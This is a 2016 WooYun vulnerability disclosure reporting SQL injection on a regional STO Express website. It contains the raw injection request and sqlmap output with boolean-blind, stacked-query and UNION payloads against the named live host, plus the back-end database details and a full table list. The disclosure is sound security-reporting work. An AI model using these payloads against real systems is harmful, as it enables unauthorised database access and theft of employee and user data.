当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0172232

漏洞标题:申通快递某站存在SQL注入漏洞

相关厂商:申通快递

漏洞作者: 路人甲

提交时间:2016-01-23 19:40

修复时间:2016-03-08 21:29

公开时间:2016-03-08 21:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-23: 细节已通知厂商并且等待厂商处理中
2016-01-24: 厂商已经确认,细节仅向厂商公开
2016-02-03: 细节向核心白帽子及相关领域专家公开
2016-02-13: 细节向普通白帽子公开
2016-02-23: 细节向实习白帽子公开
2016-03-08: 细节向公众公开

简要描述:

详细说明:

GET /Dot.asp?Area=-1' OR 1=1* --  HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.gdsto.com.cn/
Cookie: ASPSESSIONIDACBDCSSA=GANBFHOBEOMPODKONKIGHILO; ASPSESSIONIDACBADSTA=AHOJCDLCAKCKFIILHAAPCHIB
Host: www.gdsto.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

4.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1 AND 6075=6075 --
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1;WAITFOR DELAY '0:0:5'-- --
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: http://www.gdsto.com.cn:80/Dot.asp?Area=-1' OR 1=1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(106)+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(66)+CHAR(88)+CHAR(102)+CHAR(76)+CHAR(99)+CHAR(77)+CHAR(116)+CHAR(87)+CHAR(97)+CHAR(97)+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL--  --
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: zktime_st
[140 tables]
+------------------------------+
| acc_antiback                 |
| acc_device                   |
| acc_door                     |
| acc_firstopen                |
| acc_firstopen_emp            |
| acc_holidays                 |
| acc_interlock                |
| acc_levelset                 |
| acc_levelset_door_group      |
| acc_levelset_emp             |
| acc_linkageio                |
| acc_map                      |
| acc_mapdoorpos               |
| acc_monitor_log              |
| acc_morecardempgroup         |
| acc_morecardgroup            |
| acc_morecardset              |
| acc_timeseg                  |
| acc_wiegandfmt               |
| action_log                   |
| areaadmin                    |
| att_attreport                |
| att_overtime                 |
| att_waitforprocessdata       |
| attcalclog                   |
| attexception                 |
| attparam                     |
| attrecabnormite              |
| attshifts                    |
| auth_group                   |
| auth_group_permissions       |
| auth_message                 |
| auth_permission              |
| auth_user                    |
| auth_user_groups             |
| auth_user_user_permissions   |
| base_additiondata            |
| base_appoption               |
| base_basecode                |
| base_datatranslation         |
| base_operatortemplate        |
| base_option                  |
| base_personaloption          |
| base_strresource             |
| base_strtranslation          |
| base_systemoption            |
| checkexact                   |
| checkinout                   |
| dbapp_viewmodel              |
| dbbackuplog                  |
| departments                  |
| deptadmin                    |
| devcmds                      |
| devcmds_bak                  |
| devlog                       |
| django_content_type          |
| django_session               |
| empitemdefine                |
| facetemplate                 |
| holidays                     |
| iclock                       |
| iclock_dininghall            |
| iclock_dstime                |
| iclock_notice                |
| iclock_oplog                 |
| iclock_testdata              |
| iclock_testdata_admin_area   |
| iclock_testdata_admin_dept   |
| leaveclass                   |
| leaveclass1                  |
| meeting_detailmeeting        |
| meeting_leave                |
| meeting_meetingemp           |
| meeting_meetingentity        |
| meeting_meetingexact         |
| meeting_meetingreport        |
| meeting_originalrecord       |
| meeting_room                 |
| meeting_room_devices         |
| meeting_statisticsmeeting    |
| meeting_type                 |
| meeting_validrecord          |
| num_run                      |
| num_run_deil                 |
| operatecmds                  |
| personnel_area               |
| personnel_cardtype           |
| personnel_cities             |
| personnel_countries          |
| personnel_education          |
| personnel_empchange          |
| personnel_iccard             |
| personnel_iccard_posmeal     |
| personnel_iccard_use_mechine |
| personnel_issuecard          |
| personnel_leavelog           |
| personnel_meal               |
| personnel_national           |
| personnel_positions          |
| personnel_state              |
| pos_allowance                |
| pos_allowancesetting         |
| pos_batchtime                |
| pos_carcashsz                |
| pos_carcashszbak             |
| pos_carcashtype              |
| pos_cardmanage               |
| pos_cardserial               |
| pos_errors                   |
| pos_handconsume              |
| pos_icconsumerlist           |
| pos_icconsumerlistbak        |
| pos_keydetail                |
| pos_keyvalue                 |
| pos_keyvalue_use_mechine     |
| pos_loseunitecard            |
| pos_merchandise              |
| pos_posdevlog                |
| pos_poslog                   |
| pos_replenishcard            |
| pos_splittime                |
| pos_splittime_use_mechine    |
| pos_storedetail              |
| pos_timebrush                |
| pos_timedetail               |
| pos_timeslice                |
| posparam                     |
| schclass                     |
| setuseratt                   |
| template                     |
| user_of_run                  |
| user_speday                  |
| user_temp_sch                |
| userinfo                     |
| userinfo_attarea             |
| useruusedsclasses            |
| worktable_groupmsg           |
| worktable_instantmsg         |
| worktable_msgtype            |
| worktable_usrmsg             |
+------------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-01-24 13:51

厂商回复:

谢谢

最新状态:

暂无